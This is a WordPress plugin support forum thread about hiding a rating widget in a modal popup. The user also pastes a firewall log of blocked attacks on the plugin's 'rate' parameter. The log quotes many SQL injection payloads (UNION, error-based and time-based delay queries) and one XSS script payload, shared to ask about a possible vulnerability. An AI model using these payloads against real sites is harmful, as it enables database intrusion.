Modal Pop up – how to disable rating?

  • Resolved alex008

    (@alex008)


    4 years, 6 months ago

    Hello team,
    could you please tell me how can I disable the rating in a modal pop up frame?
    I’m using theme OceanWP with add on “Modal Pop Up” and the rating is always displayed.

    Thanks.
    Alex

Viewing 11 replies - 1 through 11 (of 11 total)
  • Plugin Support Blaz K.

    (@blazk)

    Hi @alex008,

    I’ll need a bit more information such as link to the website and instructions how to replicate the problem. Are you adding the rating widget with a shortcode or automatically?

    Blaz

    Thread Starter alex008

    (@alex008)

    Hi Blaz,
    thanks for your fast answer.
    I’m using the rating automatically and it appears on every page and this is fine. But I don’t want it to appear in the modal pop up, like here:
    https://www.kindervorsorge-vergleich.de/kindervorsorge-angebot/
    If you click on the text “Datenschutzerkl?rung” it opens the modal box WITH the rating and I don’t want the rating to be displayed within the box. How can I disable it here?

    Thanks,
    Alex

    Plugin Support Blaz K.

    (@blazk)

    Hi @alex008,

    it seems that the modal box is also a post (with the id of 244) and since you are adding the rating widget to all posts it also displays there. You could try excluding the rating widget from the post with the id of 244. Alternatively, you can use shortcodes instead of the automatic option.

    Regards,
    Blaz

    Thread Starter alex008

    (@alex008)

    Thanks, yes, I already tried this in the beginning (to exclude post 244) but it didn’t work. Do you have an idea why not?
    I don’t want to use the shortcodes as I like the automatic option.

    Plugin Support Blaz K.

    (@blazk)

    Did you clear cache (in case you use it) after excluding the post? By the way are you adding the rating widget automatically also to custom post types? The automatic option is not bulletproof – in some cases other plugins/themes can interfere with it. In such cases I typically recommend using shortcodes or adding the rating widget directly to the template. More about this here.

    Blaz

    Thread Starter alex008

    (@alex008)

    I don’t use a cache plugin yet. I exclude another page, and this works.

    No, I use your plugin only on “pages”. No custom post types.

    But no problem if there’s no solution for this, I can live with this little imperfection ??
    Your plugin does a good job.

    Plugin Support Blaz K.

    (@blazk)

    @alex008,

    You could also hide the rating widget in the popup with custom CSS: 

    
.rmp-widgets-container.rmp-wp-plugin.rmp-main-container.js-rmp-widgets-container.js-rmp-widgets-container--244 {
    display: none;
}

    If only the popup is problematic, this will work just fine ??

    Regards,
    Blaz

    Thread Starter alex008

    (@alex008)

    Thanks Blaz, I’ll try it ! ??

    Not sure if it’s allowed to post another question here, if not, please simply delete it.
    I wanted to ask if you could please check of possible vulnerability, because the plugin NinjaFirewall showed some attacks within your plugin (this is just a part of them):

    12/May/20 22:08:42  #6281013  CRITICAL   114  93.99.104.xxx    POST /index.php - Cross-site scripting - [SERVER:QUERY_STRING = rate=4&UuyV%3D8192%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE...] - 
12/May/20 22:08:58  #1541537  CRITICAL   256  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4) AND (SELECT 4317 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (ELT(4317=4317,1))),0x716b7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (7172=7172] - 
12/May/20 22:08:59  #4903895  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4 AND (SELECT 4317 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (ELT(4317=4317,1))),0x716b7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)] - 
12/May/20 22:09:00  #4888335  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4 AND (SELECT 4317 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (ELT(4317=4317,1))),0x716b7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- uitk] - 
12/May/20 22:09:02  #1801639  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4') AND (SELECT 4317 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (ELT(4317=4317,1))),0x716b7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('QGsy'='QGsy] - 
12/May/20 22:09:02  #1363326  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4' AND (SELECT 4317 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (ELT(4317=4317,1))),0x716b7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MLUq'='MLUq] - 
12/May/20 22:09:03  #7704520  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4%' AND (SELECT 4317 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (ELT(4317=4317,1))),0x716b7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='] - 
12/May/20 22:09:05  #5504973  CRITICAL   256  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4) AND 7636=CAST((CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (7636=7636) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113)) AS NUMERIC)...] - 
12/May/20 22:09:06  #6866223  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4 AND 7636=CAST((CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (7636=7636) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113)) AS NUMERIC)] - 
12/May/20 22:09:07  #3384987  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4 AND 7636=CAST((CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (7636=7636) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113)) AS NUMERIC)-...] - 
12/May/20 22:09:08  #6191372  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4') AND 7636=CAST((CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (7636=7636) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113)) AS NUMERIC...] - 
12/May/20 22:09:09  #7266309  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4' AND 7636=CAST((CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (7636=7636) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113)) AS NUMERIC)...] - 
12/May/20 22:09:10  #5909694  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4%' AND 7636=CAST((CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (7636=7636) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113)) AS NUMERIC...] - 
12/May/20 22:09:11  #1720709  CRITICAL   256  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4) AND 4699 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4699=4699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113))...] - 
12/May/20 22:09:12  #1233297  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4 AND 4699 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4699=4699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)))] - 
12/May/20 22:09:13  #1407286  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4 AND 4699 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4699=4699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)))...] - 
12/May/20 22:09:14  #8110934  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4') AND 4699 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4699=4699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)...] - 
12/May/20 22:09:15  #8610624  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4' AND 4699 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4699=4699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113))...] - 
12/May/20 22:09:16  #5525063  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4%' AND 4699 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4699=4699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)...] - 
12/May/20 22:09:17  #5620345  CRITICAL   256  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4) AND 5427=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (5427=5427) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(1...] - 
12/May/20 22:09:18  #5735308  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4 AND 5427=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (5427=5427) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(12...] - 
12/May/20 22:09:19  #6505246  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4 AND 5427=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (5427=5427) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(12...] - 
12/May/20 22:09:21  #5541033  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4') AND 5427=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (5427=5427) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(...] - 
12/May/20 22:09:21  #1924922  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4' AND 5427=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (5427=5427) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(1...] - 
12/May/20 22:09:22  #8001432  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4%' AND 5427=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (5427=5427) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(...] - 
12/May/20 22:09:24  #3221175  CRITICAL   258  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = (SELECT 7686 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (ELT(7686=7686,1))),0x716b7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)] - 
12/May/20 22:09:24  #7213598  CRITICAL   264  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = (SELECT CONCAT(0x716b6b7071,(SELECT (ELT(6817=6817,1))),0x716b7a7071))] - 
12/May/20 22:09:26  #2750837  HIGH       257  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = (SELECT (CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (8321=8321) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113)))] - 
12/May/20 22:09:26  #1430453  CRITICAL   284  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = (SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (5974=5974) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113))] - 
12/May/20 22:09:28  #1790482  CRITICAL   250  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4);SELECT PG_SLEEP(5)--] - 
12/May/20 22:09:29  #3438984  CRITICAL   250  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4;SELECT PG_SLEEP(5)--] - 
12/May/20 22:09:30  #6815938  CRITICAL   250  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4');SELECT PG_SLEEP(5)--] - 
12/May/20 22:09:32  #6034201  CRITICAL   250  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4';SELECT PG_SLEEP(5)--] - 
12/May/20 22:09:34  #4259135  CRITICAL   250  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4%';SELECT PG_SLEEP(5)--]
12/May/20 22:09:35  #6534022  HIGH       287  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4);WAITFOR DELAY '0:0:5'--] - 
12/May/20 22:09:37  #1897790  HIGH       287  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4;WAITFOR DELAY '0:0:5'--] - 
12/May/20 22:09:38  #4789484  HIGH       287  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4');WAITFOR DELAY '0:0:5'--] - 
12/May/20 22:09:39  #4386368  HIGH       287  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4';WAITFOR DELAY '0:0:5'--] - 
12/May/20 22:09:41  #3480292  HIGH       287  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4%';WAITFOR DELAY '0:0:5'--] - 
12/May/20 22:09:42  #5471745  CRITICAL   250  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(74)||CHR(116)||CHR(103),5) FROM DUAL--] - 
12/May/20 22:09:43  #6174484  CRITICAL   250  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(74)||CHR(116)||CHR(103),5) FROM DUAL--] - 
12/May/20 22:09:44  #4341738  CRITICAL   250  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(74)||CHR(116)||CHR(103),5) FROM DUAL--] - 
12/May/20 22:09:45  #1131253  CRITICAL   250  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(74)||CHR(116)||CHR(103),5) FROM DUAL--] - 
12/May/20 22:09:46  #8564972  CRITICAL   250  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(74)||CHR(116)||CHR(103),5) FROM DUAL--] - 
12/May/20 22:09:46  #1380854  CRITICAL   280  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4) ORDER BY 1-- hKXn] - 
12/May/20 22:09:47  #3647051  CRITICAL   260  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4) UNION ALL SELECT NULL-- CNYV] - 
12/May/20 22:09:48  #3633826  CRITICAL   260  93.99.104.xxx    POST /index.php - SQL injection - [GET:rate = 4) UNION ALL SELECT NULL,NULL-- WXif] -
    Plugin Support Blaz K.

    (@blazk)

    Hi Alex,

    as far as I know, everything is properly sanitized. The plugin’s code is also available on GitHub. Nevertheless, you can send me the complete log on [email protected]. From the log above I can’t confirm that the entries are connected to RMP.

    Blaz

    Thread Starter alex008

    (@alex008)

    Hi Blaz, ok, I’ll check this.
    One more question, back to the main topic ??
    I activated email notification when someone is rating a post.
    And I just rated within the modal pop up and I got a notification with a link that doesn’t really exit. This could be the reason of the problem.

    Besides this rating doesn’t appear anywhere. I can’t see it even in the statistic overview (rate my post statistic).

    So this rating doesn’t seem to exist. Very strange ??

    • This reply was modified 4 years, 6 months ago by alex008.
    Plugin Support Blaz K.

    (@blazk)

    Yes, something doesn’t seem to work properly on your website ?? It’s hard to say what but the problem seems to be connected to the popup plugin. I wrote that down and it will be checked ??

    Blaz

Viewing 11 replies - 1 through 11 (of 11 total)
  • The topic ‘Modal Pop up – how to disable rating?’ is closed to new replies.